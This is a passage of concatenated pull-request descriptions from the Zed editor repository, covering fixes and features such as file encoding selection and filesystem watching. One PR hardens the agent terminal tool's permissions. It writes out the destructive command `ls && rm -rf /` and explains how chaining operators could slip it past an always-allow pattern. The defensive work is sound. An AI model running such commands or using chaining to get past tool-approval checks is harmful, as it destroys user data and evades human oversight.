with GPT-5.1-Codex. I edited by hand and tested this.
---------
Co-authored-by: Lukas Wirth <lukas@zed.dev>
Closes: #46593#32635#47924
Co-authored-by: Anthony Eid <hello@anthonyeid.me>
Co-authored-by: Cole Miller <cole@zed.dev>
Release Notes:
- Fixed issues with signing into Copilot via the Settings UI
---------
Co-authored-by: Anthony Eid <hello@anthonyeid.me>
Co-authored-by: Cole Miller <cole@zed.dev>
Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com>
Co-authored-by: Anthony Eid <anthony@zed.dev>
This PR moves the `CollabNotification` component from the collab_ui
crate to the UI crate, so that we can add a component preview to it. It
also fixes problems with text truncation and other little details.
<img width="700" height="1674" alt="Screenshot 2026-01-29 at 4 07@2x"
src="https://github.com/user-attachments/assets/6aca6cff-564a-4729-b505-c02d8c3af97f"
/>
Release Notes:
- Collab: Fixed overflowing text in project sharing and call
notifications.
Reapplies #44273
I included metal-rs upgrade so we can get this working on Intel-based
Macs
cc: @JosephTLyons @notpeter @rtfeldman @Anthony-Eid
Release Notes:
- Reduced memory usage on Apple-silicon Macs by using shared memory
where appropriate
---------
Signed-off-by: Marco Mihai Condrache <52580954+marcocondrache@users.noreply.github.com>
Reverts zed-industries/zed#47799
Now that we have a week to let this be tested in Nightly we can merge it
again
Release Notes:
- Fix to many file descriptors error in MacOS
<img width="1110" height="280" alt="Screenshot 2026-01-28 at 3 35 52 PM"
src="https://github.com/user-attachments/assets/4d467e2c-2e7b-4ec7-bc87-6f0df8e667f0"
/>
<img width="1094" height="411" alt="Screenshot 2026-01-28 at 3 40 54 PM"
src="https://github.com/user-attachments/assets/f559df93-e72e-4457-ba1b-f7d6239f3285"
/>
Previously, if a user configured `^ls` as an always-allow pattern, an
attacker could craft a command like `ls && rm -rf /` which would be
auto-approved because the regex only matched the beginning of the
command string.
Now the command is parsed into individual sub-commands (`ls`, `rm -rf
/`) and EACH sub-command must match an allow pattern for auto-approval.
This prevents shell injection attacks using operators like:
- `&&` and `||` (boolean operators)
- `;` and `&` (sequential/background execution)
- `|` (pipes)
- Newlines
- Command substitution (`$()` and backticks)
- Process substitution (`<()` and `>()`)
## Matching Logic
- **always_deny**: if ANY sub-command matches, deny the entire command
- **always_confirm**: if ANY sub-command matches, require confirmation
(unless always_deny matched, in which case deny)
- **always_allow**: ALL sub-commands must match for auto-approval
(unless always_confirm or always_deny matched, in which case defer to
those)
- If parsing fails, or if the shell is unsupported, then always_allow is
disabled for this command
As usual, `always_allow_tool_actions` supercedes all of these. If it is
`true`, then we always allow all tool calls, no questions asked.
## Shell Compatibility
The shell parser only supports POSIX-like command chaining syntax (`&&`,
`||`, `;`, `|`).
**Supported shells:** Posix (sh, bash, dash, zsh), Fish 3.0+, PowerShell
7+/Pwsh, Cmd, Xonsh, Csh, Tcsh
**Unsupported shells:** Nushell (uses `and`/`or` keywords), Elvish (uses
`and`/`or` keywords), Rc (Plan 9 shell - no `&&`/`||` operators)
For unsupported shells:
- The "Always allow" UI options are hidden for the terminal tool
- If the user has `always_allow` patterns configured in settings, they
will see a `Deny` with an explanatory error message
(No release notes because granular tool permissions are behind a feature
flag.)
Release Notes:
- N/A
---------
Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com>
Brought the Markdown output up to date with how Markdown is used in the
Agent panel. This fixed an issue with outputs that were too large for
the execution view as well as made sure that markdown would wrap.
<img width="3222" height="2334" alt="image"
src="https://github.com/user-attachments/assets/c65efa53-b792-4529-909a-9117053e30be"
/>
Release Notes:
- N/A
- Remove the newlines in the unzip command string, which made it not
work.
- Fix spawning the terminal and tasks. Unfortunately, the Windows
OpenSSH server has limitations that require rather ugly workarounds.
Release Notes:
- N/A
Closes#47064Closes#20806
The previous implementation used Zed's custom fsevent crate, which
spawned a dedicated thread for each watched path. On large projects,
this could result in 100+ threads just for filesystem watching.
This PR removes the `fsevent` crate and switches to using `notify's`
FsEventWatcher directly. The notify implementation maintains a single
FSEvents stream that watches all paths on one thread. When paths are
added or removed, the stream is stopped, the path list is updated, and
the stream is restarted.
Ref: https://github.com/notify-rs/notify/blob/main/notify/src/fsevent.rs
As a result, Zed now uses one thread for filesystem watching regardless
of how many paths are watched.
Release Notes:
- On macOS, Zed now uses significantly fewer resources when watching
filesystem changes
---------
Signed-off-by: Marco Mihai Condrache <52580954+marcocondrache@users.noreply.github.com>
Co-authored-by: Anthony Eid <anthony@zed.dev>
This is in preparation of merging
https://github.com/zed-industries/zed/pull/47322, because our MacWatcher
implementation was able to watch root directories, and I wanted to
maintain that behavior to decrease the chance of any bugs occurring from
a merge
Note: Release candidate 9 for Notify was created two days ago which
means that a new version is coming out soon. We should update to v9 once
it's released to include bug fixes from upstream.
Release Notes:
- N/A
# Add "Reopen with Encoding" feature (Local/Single user)
## Summary
This PR adds a "Reopen with Encoding" feature to allow users to manually
specify an encoding and reload the active buffer.
This feature allows users to explicitly specify the encoding and reload
the file to resolve garbled text caused by incorrect detection.
## Changes
1. Added encoding picker logic to `encoding_selector`
- Implemented a modal UI accessible via the command palette, shortcuts,
or by clicking the encoding status in the status bar.
- Allows users to select from a list of supported encodings (Shift JIS,
EUC-JP, UTF-16LE, etc.).
2. Updated Buffer logic (crates/language)
- Added a `force_encoding_on_next_reload` flag to the Buffer struct.
- Updated the `reload` method to check this flag and apply the following
logic:
- **Non-Unicode (e.g., Shift JIS):** Bypasses heuristics (like BOM
checks) to force the specified encoding.
- **Unicode (e.g., UTF-8):** Performs standard BOM detection. This
ensures that the BOM is correctly handled/consumed when switching back
to UTF-8.
3. UI / Keymap
- Made the encoding status in the status bar (ActiveBufferEncoding)
clickable.
- Added default keybindings:
- macOS: cmd-k n
- Linux/Windows: ctrl-k n
- Windows: ctrl-k n
## Limitations & Scope
To ensure stability and keep the PR focused, the following scenarios are
intentionally out of scope:
1. **Collaboration and Remote Connections**
- Encoding changes are disabled when collaboration (is_shared) or SSH
remote connections (is_via_remote_server) are active.
- **Reason:** Synchronizing encoding state changes between host/guest or
handling remote reloads involves complex synchronization logic. This PR
focuses on local files only.
`Remote Connection (SSH/WSL)`
|Via status bar|Via shortcut/command|
|:---:|:---:|
|<img width="767" height="136" alt="remote_tooltip"
src="https://github.com/user-attachments/assets/6c7cb293-2486-4f6d-a3ff-2086d939398e"
width="400" />|<img width="742" height="219" alt="remote_shortcut"
src="https://github.com/user-attachments/assets/5448f199-2066-4baf-b349-a983ab2fa77a"
width="400" />|
`Collaboration Session `
|Via status bar|Via shortcut/command|
|:---:|:---:|
|<img width="734" height="86" alt="collab_tooltip"
src="https://github.com/user-attachments/assets/37de99a9-dd33-4c78-98bf-20654d41fdd0"
/>|<img width="720" height="182" alt="collab_pop"
src="https://github.com/user-attachments/assets/91d03ea7-f029-442a-8236-55234576f7ed"
/>|
2. Dirty State
- The feature is disabled if the buffer has unsaved changes to prevent
data loss during reload.
|Via status bar|Via shortcut/command|
|:---:|:---:|
|<img width="545" height="103" alt="local_dirty_tooltip"
src="https://github.com/user-attachments/assets/d9ae658e-52b3-4ecd-9873-d0ec8bd51b5d"
/>|<img width="707" height="178" alt="local_dirty_pop"
src="https://github.com/user-attachments/assets/d170ea1e-9fcb-42e7-aa3e-0555b4a19d86"
/>|
3. Files detected as Binary
Files that worktree detects as "binary" (e.g., UTF-16 files without BOM
containing non-ASCII characters) are not opened in the editor, so this
feature cannot be triggered.
**Future Work**: Fixing this would require modifying crates/worktree
heuristics or exposing a "Force Open as Text" action for InvalidItemView
to trigger. Given the scope and impact, this is deferred to a future PR.
## Test Plan
I verified the feature and BOM handling using the following scenarios:
### Preparation
Used the following test files:
-
[**test_utf8.txt**](https://github.com/user-attachments/files/24548803/test_utf8.txt):
English-only text file. No BOM.
-
[**test_utf8_bom.txt**](https://github.com/user-attachments/files/24548822/test_utf8_bom.txt):
English-only text file. With BOM.
-
[**test_utf8_jp_bom.txt**](https://github.com/user-attachments/files/24548825/test_utf8_jp_bom.txt):
UTF-8 with BOM file containing Japanese characters.
-
[**test_shiftjis_jp.txt**](https://github.com/user-attachments/files/24548827/test_shiftjis_jp.txt):
Shift-JIS file containing Japanese characters (content designed to
trigger misdetection, e.g., using only half-width katakana).
Used an external editor (VS Code or Notepad) for verification.
### Case 1: English-only file behavior
1. Open an English-only UTF-8 file (test_utf8.txt).
2. Reopen as Shift JIS.
3. **Result:**
- Text appearance remains unchanged (since ASCII is compatible).
- Status bar updates to "Shift JIS".
### Case 2: Fixing Mojibake
1. Open a Shift-JIS file (test_shiftjis_jp.txt) that causes detection
failure.
※Confirm it opens with mojibake
2. Select Shift JIS from the status bar selector.
3. **Result:**
- Mojibake is resolved, and Japanese text is displayed correctly.
- Status bar updates to "Shift JIS".
### Case 3: Unicode file with BOM behavior
1. Open an English-only UTF-8 with BOM file (test_utf8_bom.txt).
2. Reopen as `Shift JIS`.
3. **Result:**
- The BOM bytes are displayed as mojibake at the beginning of the file.
- The rest of the English text is displayed normally (ASCII
compatibility).
- Status bar updates to "Shift JIS".
### Case 4: Non-Unicode file with BOM behavior
1. Open a UTF-8 with BOM file containing Japanese
(test_utf8_jp_bom.txt).
2. Reopen as Shift JIS.
3. **Result:**
- The BOM bytes at the start are displayed as mojibake.
- The Japanese text body is displayed as mojibake (UTF-8 bytes
interpreted as Shift JIS).
- Status bar updates to "Shift JIS" (no BOM indicator).
### Case 5: Revert to Unicode
1. From the state in Case 4 (Shift JIS with mojibake), reopen as UTF-8.
2. **Result:**
- The BOM mojibake at the start disappears (consumed).
- The text returns to normal.
- Status bar updates to "UTF-8 (BOM)".
### Case 6: External BOM removal (State sync)
1. Open a UTF-8 with BOM file in Zed (test_utf8_bom.txt).
2. Open the same file in an external editor and save it as UTF-8 (No
BOM).
3. Refocus Zed.
4. **Result:**
- Text appearance remains unchanged.
- The (BOM) indicator disappears from the status bar.
- Saving in Zed and checking externally confirms the BOM is gone.
### Case 7: External BOM addition
1. From the state in Case 6 (UTF-8 No BOM), save as UTF-8 with BOM in
the external editor.
2. Refocus Zed.
3. **Result:**
- The (BOM) indicator appears in the status bar.
- Saving in Zed and checking externally confirms the BOM is present.
### Case 8: External Encoding Change (Auto-detect sync)
1. Open an English-only UTF-8 file in Zed (`test_utf8.txt`).
* *Status bar shows: "UTF-8".*
2. Open the same file in an external editor and save it as **UTF-16LE
with BOM**.
3. Refocus Zed.
4. **Result:**
* The text remains readable (no mojibake).
* **Status bar automatically updates to "UTF-16LE (BOM)".** (Verifies
that `buffer.encoding` is correctly updated during reload).
Release Notes:
- Added "Reopen with Encoding" feature (currently supported for local
files).
---------
Co-authored-by: Conrad Irwin <conrad.irwin@gmail.com>
Following the changes to the namespace caching, CI in the extensions
broke because cache conflicts arose there seemingly. Trying to set the
target here more explicitly in an effort to fix this.
Release Notes:
- N/A
